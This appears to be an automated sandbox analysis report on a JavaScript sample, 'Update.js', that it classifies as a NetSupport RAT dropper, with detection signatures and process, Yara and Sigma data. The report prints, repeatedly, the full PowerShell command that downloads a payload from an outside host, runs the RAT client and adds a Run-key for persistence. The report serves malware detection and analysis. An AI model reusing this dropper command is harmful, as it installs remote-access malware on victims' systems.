Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Update.js

Overview

General Information

Sample name:Update.js
Analysis ID:1529030
MD5:01d7daa58e16da2b30ac20fe57081bba
SHA1:8213900420ed4c22b1e896acb53f99a5989cb2cd
SHA256:a05933c299a81badef96fd575ff0f7d934c3edaf0f7478e897a2299f1ef8f11e
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • wscript.exe (PID: 7024 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 4108 cmdline: "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1d82b6:$b1: ::WriteAllBytes(
  • 0x1d8181:$b2: ::FromBase64String(
  • 0x6403b:$s3: Reverse
  • 0x640c3:$s3: Reverse
  • 0x6441f:$s3: reverse
  • 0x64475:$s3: Reverse
  • 0x644c8:$s3: Reverse
  • 0x64757:$s3: reverse
  • 0x647ad:$s3: Reverse
  • 0x647c9:$s3: reverse
  • 0x64c69:$s3: Reverse
  • 0x64cd2:$s3: Reverse
  • 0x64f96:$s3: Reverse
  • 0x65002:$s3: Reverse
  • 0x65082:$s3: Reverse
  • 0x650fb:$s3: Reverse
  • 0x6515b:$s3: Reverse
  • 0x6519f:$s3: reverse
  • 0x652f7:$s3: Reverse
  • 0x65360:$s3: Reverse
  • 0x653d6:$s3: Reverse

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 12 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      10.2.client32.exe.747f0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        10.0.client32.exe.440000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          10.2.client32.exe.73a80000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            10.2.client32.exe.111b8c68.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              10.2.client32.exe.111b8c68.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 6 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi64_7024.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                • 0x1c603b:$b1: ::WriteAllBytes(
                                • 0x1c5f06:$b2: ::FromBase64String(
                                • 0x6034a:$s3: Reverse
                                • 0x603d5:$s3: Reverse
                                • 0x60667:$s3: reverse
                                • 0x606bd:$s3: Reverse
                                • 0x60710:$s3: Reverse
                                • 0x609a9:$s3: reverse
                                • 0x609ff:$s3: Reverse
                                • 0x60a1b:$s3: reverse
                                • 0x60e8d:$s3: Reverse
                                • 0x60ef7:$s3: Reverse
                                • 0x61184:$s3: Reverse
                                • 0x611f1:$s3: Reverse
                                • 0x61273:$s3: Reverse
                                • 0x612ed:$s3: Reverse
                                • 0x6134e:$s3: Reverse
                                • 0x61394:$s3: reverse
                                • 0x614f3:$s3: Reverse
                                • 0x6155c:$s3: Reverse
                                • 0x615d3:$s3: Reverse

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Base64 Encoded PowerShell Command Detected
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 77.83.199.112, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7024, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49705
                                Sigma detected: Suspicious PowerShell Parameter Substring
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 7024, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIWFE
                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6704, TargetFilename: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                Sigma detected: PowerShell Download Pattern
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System
                                Sigma detected: PowerShell Web Download
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object 